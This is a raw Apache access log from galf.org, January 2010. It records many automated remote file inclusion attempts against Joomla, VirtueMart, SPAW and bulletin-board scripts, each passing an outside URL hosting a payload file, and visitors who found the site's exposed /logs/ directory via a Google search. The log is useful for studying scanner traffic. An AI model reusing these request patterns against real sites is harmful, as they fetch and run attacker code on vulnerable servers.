200.93.147.154 - - [25/Jan/2010:00:27:26 -0800] "GET /logs/access.log%20%20//forum_folder/jscripts/folder_rte_files/module_table.php?editorid=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [25/Jan/2010:00:27:47 -0800] "GET /logs/access.log%20%20//board//bbs//delete_all.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
221.143.40.35 - - [25/Jan/2010:00:27:47 -0800] "GET /board//bbs//delete_all.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
221.143.40.35 - - [25/Jan/2010:00:27:47 -0800] "GET /logs//board//bbs//delete_all.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.131.226.52 - - [25/Jan/2010:00:29:19 -0800] "GET /rfihttp://dancook.fileave.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
202.131.226.52 - - [25/Jan/2010:00:29:19 -0800] "GET /logs/rfihttp://dancook.fileave.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:00:30:05 -0800] "GET /logs/access.log%20%20//forum_folder/jscripts/folder_rte_files/module_table.php?editorid=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [25/Jan/2010:00:31:57 -0800] "GET /logs/access.log//installation/index.php?mosConfig_absolute_path=http://www.rajrajeswari.com/includes/domit/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
91.121.25.16 - - [25/Jan/2010:00:32:05 -0800] "GET /installation/index.php?mosConfig_absolute_path=http://www.rajrajeswari.com/includes/domit/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [25/Jan/2010:00:32:05 -0800] "GET /logs//installation/index.php?mosConfig_absolute_path=http://www.rajrajeswari.com/includes/domit/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [25/Jan/2010:00:32:05 -0800] "GET /logs/access_090907.log//installation/index.php?mosConfig_absolute_path=http://www.rajrajeswari.com/includes/domit/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [25/Jan/2010:00:32:42 -0800] "GET /logs/rfihttp://dancook.fileave.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
202.131.226.52 - - [25/Jan/2010:00:32:42 -0800] "GET /rfihttp://dancook.fileave.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:00:34:31 -0800] "GET /logs/access_100118.log%20%20//forum_folder/jscripts/folder_rte_files/module_table.php?editorid=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [25/Jan/2010:00:34:56 -0800] "GET /board//bbs//delete_all.php?board_skin_path=http://www.raygina.de/cms/son?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [25/Jan/2010:00:34:56 -0800] "GET /logs//board//bbs//delete_all.php?board_skin_path=http://www.raygina.de/cms/son?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [25/Jan/2010:00:34:56 -0800] "GET /logs/access.log%20%20//board//bbs//delete_all.php?board_skin_path=http://www.raygina.de/cms/son?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
87.98.222.207 - - [25/Jan/2010:00:35:26 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:35:26 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:35:26 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:35:27 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:35:27 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:35:27 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:35:35 -0800] "GET /logs/access_091207.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:35:36 -0800] "GET /logs/access_091207.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:35:50 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:35:50 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:35:50 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:35:59 -0800] "GET /logs/access_091207.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:36:56 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:36:56 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:36:56 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:37:21 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:37:21 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:37:21 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:37:43 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:37:43 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:37:43 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.113.224 - - [25/Jan/2010:00:38:26 -0800] "GET /logs/scripts.log HTTP/1.0" 200 1787686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:38:28 -0800] "GET /logs/access_090713.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:38:29 -0800] "GET /logs/access_090713.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:38:47 -0800] "GET /logs/access_090713.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [25/Jan/2010:00:40:21 -0800] "GET /logs/access_090720.log//delete_all.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [25/Jan/2010:00:40:21 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [25/Jan/2010:00:40:22 -0800] "GET /delete_all.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [25/Jan/2010:00:40:23 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [25/Jan/2010:00:40:23 -0800] "GET /delete_all.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [25/Jan/2010:00:40:23 -0800] "GET /logs/access_090720.log//delete_all.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:41:07 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:41:07 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:41:07 -0800] "GET /logs/access_091207.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:41:33 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:41:33 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:41:33 -0800] "GET /logs/access_091207.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:41:50 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:41:50 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:41:50 -0800] "GET /logs/access_091207.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:42:16 -0800] "GET /logs/access_091109.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:42:33 -0800] "GET /logs/access_091109.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:42:52 -0800] "GET /logs/access_091109.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.179.78.83 - - [25/Jan/2010:00:43:13 -0800] "GET /logs/ HTTP/1.1" 200 4799 "http://www.google.com.tr/search?hl=tr&source=hp&q=Index+of+%2Flogs&btnG=Google%27da+Ara&meta=&aq=f&oq=" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)" "www.galf.org"
78.179.78.83 - - [25/Jan/2010:00:43:13 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)" "www.galf.org"
78.179.78.83 - - [25/Jan/2010:00:43:15 -0800] "GET /logs/access.log HTTP/1.1" 200 212441 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)" "www.galf.org"
211.174.63.235 - - [25/Jan/2010:00:43:22 -0800] "GET /logs/access.log//installation/index.php?mosConfig_absolute_path=http://www.rajrajeswari.com/includes/domit/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.174.63.235 - - [25/Jan/2010:00:43:22 -0800] "GET /logs//installation/index.php?mosConfig_absolute_path=http://www.rajrajeswari.com/includes/domit/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.174.63.235 - - [25/Jan/2010:00:43:22 -0800] "GET /installation/index.php?mosConfig_absolute_path=http://www.rajrajeswari.com/includes/domit/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.99.134.49 - - [25/Jan/2010:00:43:23 -0800] "GET /logs/ HTTP/1.1" 200 4799 "http://www.google.com.tr/search?hl=tr&source=hp&q=Index+of+%2Flogs&btnG=Google%27da+Ara&meta=&aq=f&oq=" "Opera/9.80 (Windows NT 5.1; U; tr) Presto/2.2.15 Version/10.10" "www.galf.org"
85.99.134.49 - - [25/Jan/2010:00:43:24 -0800] "GET /favicon.ico HTTP/1.1" 404 - "http://www.galf.org/logs/" "Opera/9.80 (Windows NT 5.1; U; tr) Presto/2.2.15 Version/10.10" "www.galf.org"
64.62.128.254 - - [25/Jan/2010:00:44:01 -0800] "GET /http://210.205.6.168/~shop/idx.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
64.62.128.254 - - [25/Jan/2010:00:44:32 -0800] "GET /http://210.205.6.168/~shop/idx.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
64.62.128.254 - - [25/Jan/2010:00:44:35 -0800] "GET /logs/access.log/http://210.205.6.168/~shop/idx.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
64.62.128.254 - - [25/Jan/2010:00:44:35 -0800] "GET /http://210.205.6.168/~shop/idx.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
64.62.128.254 - - [25/Jan/2010:00:44:36 -0800] "GET /logs/http://210.205.6.168/~shop/idx.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
85.99.134.49 - - [25/Jan/2010:00:44:50 -0800] "GET /logs/access_090720.log HTTP/1.1" 200 6858611 "http://www.galf.org/logs/" "Opera/9.80 (Windows NT 5.1; U; tr) Presto/2.2.15 Version/10.10" "www.galf.org"
202.131.226.52 - - [25/Jan/2010:00:45:07 -0800] "GET /logs/access.log///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dancook.fileave.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
202.131.226.52 - - [25/Jan/2010:00:45:07 -0800] "GET /logs///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dancook.fileave.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
202.131.226.52 - - [25/Jan/2010:00:45:07 -0800] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dancook.fileave.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
202.131.226.52 - - [25/Jan/2010:00:45:49 -0800] "GET /logs/access.log///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dancook.fileave.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
202.131.226.52 - - [25/Jan/2010:00:45:49 -0800] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dancook.fileave.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
202.131.226.52 - - [25/Jan/2010:00:45:49 -0800] "GET /logs///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dancook.fileave.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
202.131.226.52 - - [25/Jan/2010:00:46:27 -0800] "GET /logs/access_091012.log%20//admin/spaw/spaw_control.class.php?spaw_root=http://dancook.fileave.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
202.131.226.52 - - [25/Jan/2010:00:46:27 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://dancook.fileave.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
202.131.226.52 - - [25/Jan/2010:00:46:27 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://dancook.fileave.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
64.62.128.254 - - [25/Jan/2010:00:46:41 -0800] "GET /logs/access_090720.log/http://210.205.6.168/~shop/idx.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
64.62.128.254 - - [25/Jan/2010:00:46:41 -0800] "GET /http://210.205.6.168/~shop/idx.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
64.62.128.254 - - [25/Jan/2010:00:46:41 -0800] "GET /logs/http://210.205.6.168/~shop/idx.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:00:48:31 -0800] "GET /logs/access_100118.log//forum_folder/jscripts/folder_rte_files/module_table.php?editorid=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:00:48:33 -0800] "GET /logs/access_100118.log//forum_folder/jscripts/folder_rte_files/module_table.php?editorid=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.94.33.242 - - [25/Jan/2010:00:48:48 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
85.94.33.242 - - [25/Jan/2010:00:48:48 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
85.94.33.242 - - [25/Jan/2010:00:48:49 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.alst.ru/cmd??&cmd=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
85.94.33.242 - - [25/Jan/2010:00:48:49 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.alst.ru/cmd??&cmd=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
210.205.6.130 - - [25/Jan/2010:00:48:59 -0800] "GET /logs//delete_all.php?board_skin_path=http://choigaeul.com/board/data/file/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.galf.org"
210.205.6.130 - - [25/Jan/2010:00:48:59 -0800] "GET /delete_all.php?board_skin_path=http://choigaeul.com/board/data/file/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.galf.org"
210.205.6.130 - - [25/Jan/2010:00:51:15 -0800] "GET /delete_all.php?board_skin_path=http://choigaeul.com/board/data/file/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "galf.org"
210.205.6.130 - - [25/Jan/2010:00:51:15 -0800] "GET /logs//delete_all.php?board_skin_path=http://choigaeul.com/board/data/file/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "galf.org"
116.125.126.97 - - [25/Jan/2010:00:51:35 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.pymexpo.org/skins/com/tool/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.125.126.97 - - [25/Jan/2010:00:51:35 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.pymexpo.org/skins/com/tool/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.125.126.97 - - [25/Jan/2010:00:51:35 -0800] "GET /logs/access_091019.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.pymexpo.org/skins/com/tool/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:00:51:36 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:00:51:36 -0800] "GET /logs/access_100118.log//bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:00:51:36 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:00:51:47 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:00:51:47 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:00:51:47 -0800] "GET /logs/access_100118.log//bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [25/Jan/2010:00:51:49 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://epvs.ru/project_files/11_78.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [25/Jan/2010:00:51:49 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://epvs.ru/project_files/11_78.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [25/Jan/2010:00:51:49 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://epvs.ru/project_files/11_78.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [25/Jan/2010:00:51:52 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://epvs.ru/project_files/11_78.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [25/Jan/2010:00:51:53 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://epvs.ru/project_files/11_78.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [25/Jan/2010:00:51:53 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://epvs.ru/project_files/11_78.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [25/Jan/2010:00:52:43 -0800] "GET /logs/access_091116.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://epvs.ru/project_files/11_78.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [25/Jan/2010:00:52:45 -0800] "GET /logs/access_091116.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://epvs.ru/project_files/11_78.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [25/Jan/2010:00:52:46 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://epvs.ru/project_files/11_78.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [25/Jan/2010:00:52:46 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://epvs.ru/project_files/11_78.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [25/Jan/2010:00:52:46 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://epvs.ru/project_files/11_78.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:00:53:01 -0800] "GET /logs/access.log%20%20/write_update.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
